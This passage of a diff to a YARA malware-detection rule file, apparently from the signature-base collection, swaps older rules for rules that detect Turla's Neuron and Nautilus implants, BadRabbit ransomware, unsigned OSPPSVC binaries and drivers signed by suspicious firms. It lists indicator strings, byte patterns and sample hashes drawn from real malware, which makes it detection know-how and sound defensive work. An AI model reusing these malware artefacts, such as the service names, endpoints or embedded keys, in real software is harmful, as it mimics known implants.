+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and pe.imports ( "advapi32.dll" , "StartServiceCtrlDispatcherA" ) and pe.imports ( "advapi32.dll" , "RegEnumValueA" ) and pe.imports ( "advapi32.dll" , "RegEnumKeyExA" ) and pe.imports ( "ncrypt.dll" , "NCryptOpenStorageProvider" ) and pe.imports ( "ncrypt.dll" , "NCryptEnumKeys" ) and pe.imports ( "ncrypt.dll" , "NCryptOpenKey" ) and pe.imports ( "ncrypt.dll" , "NCryptDecrypt" ) and pe.imports ( "ncrypt.dll" , "BCryptGenerateSymmetricKey" ) and pe.imports ( "ncrypt.dll" , "BCryptGetProperty" ) and pe.imports ( "ncrypt.dll" , "BCryptDecrypt" ) and pe.imports ( "ncrypt.dll" , "BCryptEncrypt" ) and all of them
 }
-rule SIGNATURE_BASE_Sphinx_Moth_Kerberos64 : FILE
+rule SIGNATURE_BASE_Neuron_Common_Strings : FILE
 {
 	meta:
-		description = "sphinx moth threat group file kerberos64.dll"
-		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
-		id = "5a2487e4-cda4-5d45-9351-edd2b69c460a"
-		date = "2015-08-06"
+		description = "Rule for detection of Neuron based on commonly used strings"
+		author = "NCSC UK"
+		id = "168214d4-7436-531e-9c1f-48ca22215a1b"
+		date = "2017-11-23"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L87-L104"
+		reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_neuron.yar#L9-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "13aeb72fcd0f5fd6e73464a90787c756c50569f9eae48945e4ff90d8f9073585"
+		hash = "d1d7a96fcadc137e80ad866c838502713db9cdfe59939342b8e3beacf9c7fe29"
+		logic_hash = "5f7a704fa0b6892b40868689c876e2f8252bb7319424212454408cbdf66f0b9f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s0 = "KERBEROS64.dll" fullword ascii
-		$s1 = "zeSecurityDescriptor" fullword ascii
-		$s2 = "SpGetInfo" fullword ascii
-		$s3 = "SpShutdown" fullword ascii
-		$op0 = { 75 05 e8 6a c7 ff ff 48 8b 1d 47 d6 00 00 33 ff }
-		$op1 = { 48 89 05 0c 2b 01 00 c7 05 e2 29 01 00 09 04 00 }
-		$op2 = { 48 8d 3d e3 ee 00 00 ba 58 }
+		$strServiceName = "MSExchangeService" ascii
+		$strReqParameter_1 = "cadataKey" wide
+		$strReqParameter_3 = "cadata" wide
+		$strReqParameter_4 = "cadataSig" wide
+		$strEmbeddedKey = "PFJTQUtleVZhbHVlPjxNb2R1bHVzPnZ3WXRKcnNRZjVTcCtWVG9Rb2xuaEVkMHVwWDFrVElFTUNTNEFnRkRCclNm clpKS0owN3BYYjh2b2FxdUtseXF2RzBJcHV0YXhDMVRYazRoeFNrdEpzbHljU3RFaHBUc1l4OVBEcURabVVZVklVb HlwSFN1K3ljWUJWVFdubTZmN0JTNW1pYnM0UWhMZElRbnl1ajFMQyt6TUhwZ0xmdEc2b1d5b0hyd1ZNaz08L01vZH VsdXM+PEV4cG9uZW50PkFRQUI8L0V4cG9uZW50PjwvUlNBS2V5VmFsdWU+" wide
+		$strDefaultKey = "8d963325-01b8-4671-8e82-d0904275ab06" wide
+		$strIdentifier = "MSXEWS" wide
+		$strListenEndpoint = "443/ews/exchange/" wide
+		$strB64RegKeySubstring = "U09GVFdBUkVcTWljcm9zb2Z0XENyeXB0b2dyYXBo" wide
+		$strName = "neuron_service" ascii
+		$dotnetMagic = "BSJB" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 406KB and all of ( $s* ) and 1 of ( $op* )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $dotnetMagic and 6 of ( $str* )
 }
-rule SIGNATURE_BASE_Sphinx_Moth_Nvcplex : FILE
+rule SIGNATURE_BASE_Nautilus_Forensic_Artificats
 {
 	meta:
-		description = "sphinx moth threat group file nvcplex.dat"
-		author = "Kudelski Security - Nagravision SA"
-		id = "dd1b4071-adf5-5d54-9b4c-877f0965bdc7"
-		date = "2015-08-06"
+		description = "Rule for detection of Nautilus related strings"
+		author = "NCSC UK / Florian Roth"
+		id = "0c0a24da-4dbc-543a-9ec0-a5b1ec75c889"
+		date = "2017-11-23"
 		modified = "2023-12-05"
-		reference = "www.kudelskisecurity.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L106-L120"
+		reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_neuron.yar#L98-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2f851c0ab8c4a426b00addfbe0da7ceebb08e93014efcb11d64247d14fec909b"
-		score = 75
+		logic_hash = "17ae559a4640636f1285c7078a4366954d5a41c098419db32315e354f0ae619d"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s0 = "mshtaex.exe" fullword wide
-		$op0 = { 41 8b cc 44 89 6c 24 28 48 89 7c 24 20 ff 15 d3 }
-		$op1 = { 48 3b 0d ad 8f 00 00 74 05 e8 ba f5 ff ff 48 8b }
-		$op2 = { 8b ce e8 49 47 00 00 90 8b 43 04 89 05 93 f1 00 }
+		$ = "App_Web_juvjerf3.dll" fullword ascii
+		$ = "App_Web_vcplrg8q.dll" fullword ascii
+		$ = "ar_all2.txt" fullword ascii
+		$ = "ar_sa.txt" fullword ascii
+		$ = "Convert.FromBase64String(temp[1])" fullword ascii
+		$ = "D68gq#5p0(3Ndsk!" fullword ascii
+		$ = "dcomnetsrv" fullword ascii
+		$ = "ERRORF~1.ASP" fullword ascii
+		$ = "intelliAdminRpc" fullword ascii
+		$ = "J8fs4F4rnP7nFl#f" fullword ascii
+		$ = "Msnb.exe" fullword ascii
+		$ = "nautilus-service.dll"
+		$ = "Neuron_service" fullword ascii
+		$ = "owa_ar2.bat" fullword ascii
+		$ = "payload.x64.dll.system" fullword ascii
+		$ = "service.x64.dll.system" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 214KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_Sentinelone_Remotepotato0_Privesc : FILE
+
+rule SIGNATURE_BASE_SUSP_Unsigned_OSPPSVC : FILE
 {
 	meta:
-		description = "Detects RemotePotato0 binary"
-		author = "SentinelOne"
-		id = "f6dffd6b-e794-5c4a-9700-5c2022168f44"
-		date = "2021-04-26"
+		description = "Detects a suspicious unsigned office software protection platform service binary"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0e312237-0c82-59da-b62d-56065c6075f0"
+		date = "2019-09-26"
 		modified = "2023-12-05"
-		reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_remote_potato0.yar#L2-L17"
+		reference = "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sign_anomalies.yar#L4-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f3a3a917908af6260f40b217f966750a095140abb6bf85cf3a728725bc16996f"
-		score = 75
-		quality = 79
+		logic_hash = "27d8d8d19e25a2e3cffb765a0b3122e38dcb72d60c00c554163ee193a04b3d82"
+		score = 65
+		quality = 85
 		tags = "FILE"
+		hash1 = "5294a730f1f0a176583b9ca2b988b3f5ec65dad8c6ebe556b5135566f2c16a56"
 
 	strings:
-		$import1 = "CoGetInstanceFromIStorage"
-		$istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
-		$meow_header = { 4d 45 4f 57 }
-		$clsid1 = "{11111111-2222-3333-4444-555555555555}" wide ascii
-		$clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii
+		$sc1 = { 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63
+               00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00
+               00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
+               00 66 00 74 00 20 00 4F 00 66 00 66 00 69 00 63
+               00 65 00 20 00 53 00 6F 00 66 00 74 00 77 00 61
+               00 72 00 65 00 20 00 50 00 72 00 6F 00 74 00 65
+               00 63 00 74 00 69 00 6F 00 6E 00 20 00 50 00 6C
+               00 61 00 74 00 66 00 6F 00 72 00 6D 00 20 00 53
+               00 65 00 72 00 76 00 69 00 63 00 65 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and $import1 and $istorage_clsid and $meow_header and 1 of ( $clsid* )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and $sc1 and pe.number_of_signatures < 1
 }
-rule SIGNATURE_BASE_Office_OLE_DDE : FILE
+rule SIGNATURE_BASE_SUSP_PE_Signed_By_Suspicious_Entitiy_Mar23 : FILE
 {
 	meta:
-		description = "Detects DDE in MS Office documents"
-		author = "NVISO Labs"
-		id = "2ead3cc9-f517-5916-93c9-1393362aa45d"
-		date = "2017-10-12"
+		description = "Find driver signed by suspicious company (see references)"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "13151f9b-22cb-551f-81b4-a60a301f0bfc"
+		date = "2023-03-06"
 		modified = "2023-12-05"
-		reference = "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_dde_in_office_docs.yar#L48-L63"
+		reference = "https://www.sentinelone.com/labs/driving-through-defenses-targeted-attacks-leverage-signed-malicious-microsoft-drivers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sign_anomalies.yar#L28-L214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d2f7dce166dc8ef8aba7e8eaafaf4d1bb34cdc1ce97d34125a65147cf5e08ac"
-		score = 50
-		quality = 35
+		hash = "2fb7a38e69a88e3da8fece4c6a1a81842c1be6ae9d6ac299afa4aef4eb55fd4b"
+		hash = "9a24befcc0c0926abb49d43174fe25c2469cca06d6ab3b5000d7c9d434c42fe9"
+		hash = "9ad716f0173489e74fefe086000dfbea9dc093b1c3460bed9cdb82f923073806"
+		hash = "a007c8c6c1aecfff1065429fef691e7ae1c0ce20012a113f01ac57c61564a627"
+		hash = "fbe82a21939d04735aa3bbf23fbabd45ac491a143396e8e62ee20509c1257918"
+		hash = "d12c6ea0a86c58ea2d80d1dc9b793ba28a0db92c72bb5b6f4ee2b800fe42091b"
+		hash = "4cf31d000f1542690cbc0ace41e4166651a71747978dc408e3cce32e82713917"
+		hash = "e1adaea335b20d4d2e351f7bea496cd40cb379376900434866db342f851d9ddf"
+		hash = "031408cf2f2c282bcc05066356fcc2bb862b7e3c504ab7ffb0220bea341404a5"
+		hash = "2f13d4e1bd35f6c0ad0978af19006c17193cf3d42b71cba763cca68f7e9d7fca"
+		hash = "cb40a5dc4f6a27b1dc50176770026b827f8baa05fa95a98a4e880652f6729d96"
+		hash = "a7591b7384bd10eb934f0dac8dcbfdff8c352eba2309f4d75553567fa2376efa"
+		hash = "d517ce5f132b3274f0b9783a5b0c37d1d648e6079874960af24ca764b011c042"
+		hash = "aeec903013d5b66f0ae1c6fa50bb892759149c1cec86db8089a4e60482e02250"
+		hash = "0d22828724cb7fbc6cef7f98665d020867d2eb801cff2c21f2e97e481040499b"
+		hash = "4b2e874d51d332fd840dadd463a393f9f019de46e49de73be910b9b1365e4e4e"
+		hash = "3839c0925acf836238ba9a0c5798b84b1c089a8353cc27ae7e6b75d273b539e3"
+		hash = "c470f519fb0d4a2862035e0d9e105a0a6918adc51842b12ad14b5b5f34879963"
+		hash = "cc6d174bc86f84f5a4c516e9c04947e2fecc0509a84748ea80576aeee5950aed"
+		hash = "6fe8df70254f9b5f53452815f0163cb2ffb2d7f0f5aefbb9b149ad1be9284e31"
+		hash = "4cde473fb68fa9b2709ea8a23349cd2fce8b8b3991b9fea12f95d12292b8aa7a"
+		hash = "e2c40c8dd60bb395807c39c76bfdf5cd158ebefd2a47ad3306a96662c50057c0"
+		hash = "9c12b09b529fa517eaeb49df22527d7563b5432d62776166048d97f83b2dce5c"
+		hash = "5a4e17287f3dceb5bf1ed411e5fdd7e8692aebf2a19b334327733fc1c158b0ba"
+		hash = "c42964aa7fa354b1a285bdbcbd9e84b6bdd8813ff9361955e0e455d032803cce"
+		hash = "ffd6955bf40957a35901d82fd5b96d0cb191b651d3eca7afa779eebfed0d9f7e"
+		hash = "f6874335eb0d611d47b2ec99a6b70f7b373a50d8d1f62d290b06174f42279f36"
+		hash = "4e6d7fd70a143f19429fead2c14779aea9d9140e270bb9e91e47fa601643e40e"
+		hash = "7b0e4aae37660b1099de69f4c14f5d976f260c64a4af8495ff1415512a6268ba"
+		hash = "db45cbfb094f3e1ebf1cb3880087a24d4e771cc43ba48ad373e6283cbe7391da"
+		hash = "813edc804f59a97ec9391ea0db4b779443bd8daf1e64c622b5e3c9a22ee9c2e0"
+		hash = "8d66a4b7c2ae468390d32e5e70b3f9b7cb796b54b7c404cde038de9786be8d1d"
+		hash = "85936141f0f32cf8f3173655e7200236d1fce6ef9c2616fd2b19ae7951c644c5"
+		hash = "b5fc0cc9980fc594a18682d2b0d5b0d0f19ba7a35d35106693a78f4aaba346ac"
+		hash = "7aae36c5ffa8baaab19724dae051673ddafd36107cb61c505926bfceaadcd516"
+		hash = "5d0228a0d321e2ddac5502da04ca7a2b2744f3dc1382daa5f02faa9da5aface1"
+		hash = "2af1ac8bc8ae8d7cad703d2695f2f6c6d79b82eebba01253a8ec527e11e83fcd"
+		hash = "c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497"
+		hash = "0e339c9c8a6702b32ee9f2915512cbeb3391ced74b16c7e0aed9b1a80c9e58c8"
+		hash = "80bdeaa4f162c65722b700e4ffba31701d0d634f5533e59bf3885dc67ee92f3f"
+		hash = "4570f64f2000bdaf53aec0fc2214c8bd54e0f5cb75987cdf1f8bda6ea5fc4c43"
+		hash = "a9c906bde6c8a693d5d46c9922dafa2dfd2dec0fff554f3f6a953c2e36d3f7b7"
+		hash = "520df3ddd7c9ecdeecac8e443d75ac258c26b45d37ecec22501afdda797f6a0a"
+		hash = "4d3e0f27a7bcfd4b442b489c63641af22285ca41c6d56ac1db734196ab10b315"
+		hash = "5000b3b1d593ba40cc10098644af1551259590ac67d3726fab2be87aad460877"
+		hash = "7c27bd6104fc67dd16e655f3bf67c2abd8b5bf2a693ba714ac86904c5765b316"
+		hash = "34b1234eab7ff10edde9e09ecf73c5e4bfe9ee047ccfdb43de1e1f6155afad0c"
+		hash = "f6fe2cc9ea31f85273c26e84422137df21cfce4b9e972b0db94fe3a67b54f6ca"
+		hash = "ec4d0828196926bd36325f4b021895d37cfaaa024f754b36618c78b2574f0122"
+		hash = "2a89f263d85da8fb0c934d287b5b524744479741491c740aaa46ac9f694f6d1b"
+		hash = "c8d0122974fc10a7d82c62f3e6573a94379c026dd741fd73497afdf36d3929be"
+		hash = "0345f71876bc4c888deadba7284565a8da112901f343e54b8522279968abd1b2"
+		hash = "6c0e10650be9e795dc6adfbe8aad8c1c3a8657e4c45cb82a7d5188ee24021ca0"
+		hash = "90b8d9c4ff3e4e0a0342e0d91da3a25be2fead29f3b32888bb35f8575845259d"
+		hash = "0310400c9e62c3fe08dc6506313e26f7c5c89035c81b0141ce57543910c1c42e"
+		hash = "b0da0316443f878aad0b3d9764b631d5df60e119ab59324c37640da1b431893a"
+		hash = "cc4bd06f27a5f266bc8825a08e5f45dcaa4352eb6d69214b5037d28cc8de6908"
+		hash = "2d4b7c6931203923db9a07e1ac92124e799f3747ab20e95e191e99c7b98f3fbd"
+		hash = "b5965de0d883fd0602037f3dc26fd4461e6328612f1a34798cff0066142e13c4"
+		hash = "86ce17183ddf32379db53ecaedefe0811252165b05cd326025bb8eca2e6a25d7"
+		hash = "6edca16d5aa751aa4c212e6477121d51e4d9b9432896d25b41938a27a554bbe7"
+		hash = "cdd8966e0cf08a6578e34de7498a44413a6adabae04d81ef3129f26305966db2"
+		hash = "df890974589ed2435f53b8c8f147a06752f1b37404afd4431362c1938fcb451e"
+		hash = "3e05d8abaaa95af359e5b09efb30546d0aa693859ebc8a0970a2641556ea644c"
+		hash = "1c8ddf4b9c99c8f1945abf1527c7fa93141430680ac156a405d9a927d32f3b5e"
+		hash = "5d2ed5930ab1a650f9fb9293f49a9f35737139fdfa9f14e46a07e5d4d721ae3e"
+		hash = "18834de3e4844a418970c2184cc78c2d7cb61d18e9f7c7c0e88e994b4212edc5"
+		hash = "a6b6fc94d8e582059af0fe30c2c93c687fccd5a0073a6a26a2cd097ea96adc7c"
+		hash = "28b40fa160c915f13f046d36725c055d6c827a4d28674ea33c75a9b410321290"
+		hash = "efab0fbf77dc67a792efd1fe2b3f46bbdfdee30a9321acc189c53a6c5e90f05c"
+		hash = "348781221d1a2886923de089d1b7b12c32cfdd38628b71203da925b5736561e9"
+		hash = "a1a5f410e6eab2445d64bfcd742fe1a802a0a2d9af45c7ab398f84894dd5dc3d"
+		hash = "9de05ce0d9e9de05ebdc2859a5156f044f98bb180723f427a779d36b1913e5d3"
+		hash = "eeff7e85c50a7f11fc8a99f7048953719fb1d2a6451161a0796eac43119ece21"
+		hash = "383cc025800a3b3d089f7697e78fe4d5695a8d1ee26dcad0b0956ad6800ccae4"
+		hash = "41be6f393cea4d8d5869fff526c4d75ec66c855f7e9c176042c39b9682ea9c14"
+		hash = "71552e65433c8bbf14e5bcbc35a708bc10d6fded740c5f4783edce84aea4aabf"
+		hash = "3c1b3e8666b58a78c70f36ed557c7ecc52e84457e87e5884b42e5cd9e8c1a303"
+		hash = "4288d7113031151a2636a164c0dc6fce78c86f322271afec9ef2d4b54494c334"
+		hash = "f73a39332be393a9bc23ec27ff6d025bc90d7320dde97f37cc585ecf6c0436a2"
+		hash = "018f5103635992aa9ddc1c46cafe2b7ba659fcfbc8f8ab29dcea28e155b033ee"
+		hash = "fe650fc138dcfbbd4ab6aa5718bf3cd36f50898ae19d3aceaa12f7d4f39d0b43"
+		hash = "fa21b39cd5a24ba35433e90cae486454b7400b50e7f7f5c190fdbec6704b4352"
+		hash = "3dd36c798cc89bfad7cdbf58d7da90ba113fe043ca46bdbcab7ae7fb9dc2f42b"
+		hash = "674f4444f0de5c81c766c376a65fbdf1f7116228a61c71ffb504995c9e160183"
+		hash = "cd3d25b2842bb2d6a5580f72e819acd344ce7f3a2478fb6d53ff668ad6531228"
+		hash = "1668f4eb8a85914db46ff308b9f8a5040a024acc93259dfc004ea2b80ab6bcf1"
+		hash = "4f31cab6c011b79bf862bb6acea3086308b0576afe33affdb09039c97e723beb"
+		hash = "6b0ff48b8113076d2875edb7bea7f120b7b9d9a990ae296a5b5a95660ae7edfc"
+		hash = "956a00dd6382e83d3f7490378ae98e4fc8d9b8ec2cd549519f007091e3ccce1f"
+		hash = "8c7f938cf55728d8d41a7fa6b9953c4f81cf05ed3d7b7435ec8999e130257f7f"
+		hash = "427ee4d4d18fc0c1196326215e94947f7d8c03794de36d0127231690bf5bf3c0"
+		hash = "b6f3ece5bf7b9f6ecf99104d3c76b9007106fad98d20500956dd1e42d4ec5e8d"
+		hash = "47a0ad6150c5a1de4c788827662a9cafbd2816a7d32be2028721e49a464acbed"
+		hash = "8743ac81384fd10c0459f3574489d626e13c95dd73274dcf1d872bcd3630b9e8"
+		hash = "a1755415a12f85bea3f65807860f902cf41e56b0ab2c155ac742af3166ef1dfd"
+		hash = "3f5a91500bfade2d9708e1fbe76ae81dacdb7b0f65f335fee598546ccfc267e3"
+		hash = "5be43b773dbde6542d6a0d53cd6616ea95a49dd38659edc6ba0d580a0d9777ab"
+		hash = "90e080a63916c768b0b65787fe5695fd903d44e1b0b688d06c14988ba30b5ea7"
+		hash = "d1184ee3f26919b8f5a4b1a6d089f14e79e0c89260590156111f72a979c8e446"
+		hash = "c13ddd2bafcfdfc00fb5cb87d8eb533ae094b0dd5784df77c98bddeac9d72725"
+		hash = "9bb3035610bd09ba769c0335f23f98dd85c2f32351cdd907d4761b41ab5d099c"
+		hash = "1703025c4aed71d0ca29a3cd0e15047c24cc9adbb5239765f63e205ef7d65753"
+		hash = "948d47b9386b2b3247b7e9796ab2f2078889264559ad04ccd9362b03dbbf8534"
+		hash = "edd527d978b591d146d24d075bb4c24177e0eca6a27b5d92f35be68635cc3767"
+		hash = "c642dc125fbd83e004d2c527933996589e0fcad06313a5a56679a265b8966529"
+		hash = "cfa3a48bf0c683834d1d198a653ebced8a8faae9d0cbb38f3e859b45da81d554"
+		hash = "bb8f5d123aebdde5542724db5be8430d62a80f86f590a272aac9087d097f395c"
+		hash = "e41e10673db41b13ba17c828beb94fc39e8d3aa43b01f9fe437a2f6e0b8ae443"
+		hash = "a132e31db9f9761d6bd2c375415e615bb0a548fb02c4fd6373e9f7d1568de1dc"
+		hash = "5084c6e20b88adeea6a28508cf172048d7cf20adeaa52abdd361fc2207411055"
+		hash = "525320e3631a23a3286481710533ba15cd6268ee10be98962a55e2afead1ffbf"
+		hash = "16c74f288f4f929e74cd8e16443303aec3a64cfef64aabc14553f4c1e58c9ede"
+		hash = "4b482ebf88bcb55e7b0769690ccca4d08856c879af82ad7165436b82a315d742"
+		hash = "79c9acadd99ab1251dbba3bff7d0b67de4252f913f485465d63f4f0c4d9a6419"
+		hash = "9bcc3f36c32e3efbf8bdcba7670658042db65dd617dad0709d92c554ba841b57"
+		hash = "5654ed1205de6860e66383a27231e4ac2bb7639b07504121d313a8503ece3305"
+		hash = "5d1e3c495d08982459b4bd4fd2ab073ed2078fce9347627718a7c25adee152e9"
+		hash = "458702ae1b2ef8a113344be76af185ee137b7aac3646ece626d2eeeadcc9e003"
+		hash = "2c703e562a6266175379fa48f06f58aab109dbe56e0cde24b4b0db5f22f810a3"
+		hash = "49faf70c0978c21a68bc8395cf326f50c491e379f55b5df7d17f0af953861ece"
+		hash = "a2b16bbef0a7cb545597828466cd13225efaba6e7006bfbf59040bbff54c463c"
+		hash = "b08449d42f140c7e4d070c5f81ce7509f48282a5bb0e06948b7ed65053696a37"
+		hash = "c1633ad8c9e6c2b4cc23578655fc6cf5cd0122cfd24395d1551af1d092f89db2"
+		hash = "01f42f949a37d9d479b8021f27dcf0d0e6f0b0b6cd2e0883c6b4b494f0a1d32a"
+		hash = "4943d53a38ac123ed7c04ad44742a67ea06bb54ea02fa241d9c4ebadab4cb99a"
+		hash = "597ce12c9fbecc71299ba6fc3e4df36cc49222878d0e080c4c35bbfdffd30083"
+		hash = "0265fbd9cfc27c26c42374fce7cf0ef11f38e086308d51648b45f040d767c51d"
+		hash = "0dc92a1a6fd27144b3e35a9900038653892d25c2db8ede8b9e0aee04839f165a"
+		hash = "682582c324cb1eafacf80090f6108c1580fee12dbfdfe8b51771d429fdcce718"
+		hash = "e9e6f6e22b5924f80164fbad45be28299e9ec0bd2f404551b6ca772509a7135a"
+		hash = "a8db750f82906fb9cf9fb371ec65be76275d9b81b95e351fcb3db4ef345884ab"
+		hash = "e900b4016177259d07011139a55c0571c1e824fb7e9dddc11df493b3c8209173"
+		hash = "f8a7a26d51a5e938325deee86cbf5aa8263d3a50818c15d5a395b98658630c18"
+		hash = "861b87fc6c4758cfe1e26c7a038cffb64054ad633b7ea81319c9a98b7b49df0d"
+		hash = "848fdb491307ed7b002dbdf99796df2b286d53b2e0066d78f3554f2f38a2c438"
+		hash = "4b0c05bc33c9e7d0ed2d97dbefb6292469b9d74d650d5cfb2691345a11c0f54a"
+		hash = "948d47b9386b2b3247b7e9796ab2f2078889264559ad04ccd9362b03dbbf8534"
+		hash = "edd527d978b591d146d24d075bb4c24177e0eca6a27b5d92f35be68635cc3767"
+		hash = "c642dc125fbd83e004d2c527933996589e0fcad06313a5a56679a265b8966529"
+		hash = "cfa3a48bf0c683834d1d198a653ebced8a8faae9d0cbb38f3e859b45da81d554"
+		hash = "bb8f5d123aebdde5542724db5be8430d62a80f86f590a272aac9087d097f395c"
+		hash = "e41e10673db41b13ba17c828beb94fc39e8d3aa43b01f9fe437a2f6e0b8ae443"
+		hash = "a132e31db9f9761d6bd2c375415e615bb0a548fb02c4fd6373e9f7d1568de1dc"
+		hash = "5084c6e20b88adeea6a28508cf172048d7cf20adeaa52abdd361fc2207411055"
+		hash = "525320e3631a23a3286481710533ba15cd6268ee10be98962a55e2afead1ffbf"
+		hash = "16c74f288f4f929e74cd8e16443303aec3a64cfef64aabc14553f4c1e58c9ede"
+		hash = "4b482ebf88bcb55e7b0769690ccca4d08856c879af82ad7165436b82a315d742"
+		hash = "79c9acadd99ab1251dbba3bff7d0b67de4252f913f485465d63f4f0c4d9a6419"
+		hash = "9bcc3f36c32e3efbf8bdcba7670658042db65dd617dad0709d92c554ba841b57"
+		logic_hash = "68c3f2c97a8eab3d334222eae4c4b808e6b763896f198d033f4d11218e9ff551"
+		score = 60
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
 
 	strings:
-		$a = /\x13\s*DDE\b[^\x14]+/ nocase
-		$r1 = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
-		$r2 = "Adobe ARM Installer"
+		$cert1 = "91210242MA0YGH36" wide ascii
+		$cert2 = "Copyright (C) 2013-2021 QuickZip. All rights reserved." wide ascii
+		$cert3 = "Qi Lijun" wide ascii
+		$cert4 = {51 00 69 00 20 00 4c 00 69 00 6a 00 75 00 6e}
+		$cert5 = "Luck Bigger Technology Co., Ltd" wide ascii
+		$cert6 = {4c 00 75 00 63 00 6b 00 20 00 42 00 69 00 67 00 67 00 65 00 72 00 20 00 54 00 65 00 63 00 68 00 6e 00 6f 00 6c 00 6f 00 67 00 79 00 20 00 43 00 6f 00 2e 00 2c 00 20 00 4c 00 74 00 64 }
+		$cert7 = "XinSing Network Service Co., Ltd" wide ascii
+		$cert8 = "Hangzhou Shunwang Technology Co.,Ltd" wide ascii
+		$cert9 = "Zhuhai liancheng Technology Co., Ltd." wide ascii
+		$cert10 = { e5 a4 a7 e8 bf 9e e7 ba b5 e6 a2 a6 e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
+		$cert11 = { e5 8c 97 e4 ba ac e5 bc 98 e9 81 93 e9 95 bf e5 85 b4 e5 9b bd e9 99 85 e8 b4 b8 e6 98 93 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
+		$cert12 = { e7 a6 8f e5 bb ba e5 a5 a5 e5 88 9b e4 ba 92 e5 a8 b1 e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
+		$cert13 = { e5 8e a6 e9 97 a8 e6 81 92 e4 bf a1 e5 8d 93 e8 b6 8a e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 0a }
+		$cert14 = { e5 a4 a7 e8 bf 9e e7 ba b5 e6 a2 a6 e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
 
 	condition:
-		uint32be( 0 ) == 0xD0CF11E0 and $a and not 1 of ( $r* )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 20MB and any of ( $cert* )
 }
-rule SIGNATURE_BASE_APT_Malware_Commentcrew_Miniasp : FILE
+rule SIGNATURE_BASE_Badrabbit_Gen : FILE
 {
 	meta:
-		description = "CommentCrew Malware MiniASP APT"
+		description = "Detects BadRabbit Ransomware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a434012d-d13a-5061-a1d8-180d2c5828e8"
-		date = "2015-06-03"
+		id = "272e50f8-5aef-52ec-a5d0-01e8504d6c55"
+		date = "2017-10-25"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_miniasp.yar#L2-L38"
+		reference = "https://pastebin.com/Y7pJv3tK"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_badrabbit.yar#L11-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f382dd802f0332c99b1d33cf1dcd99ba7fad344a381152ebadfb69bc74c4e58f"
+		logic_hash = "21c63a02d0284ce759b087f4869c4ed8e6b50c37ffeb724538567e28aeae16ac"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
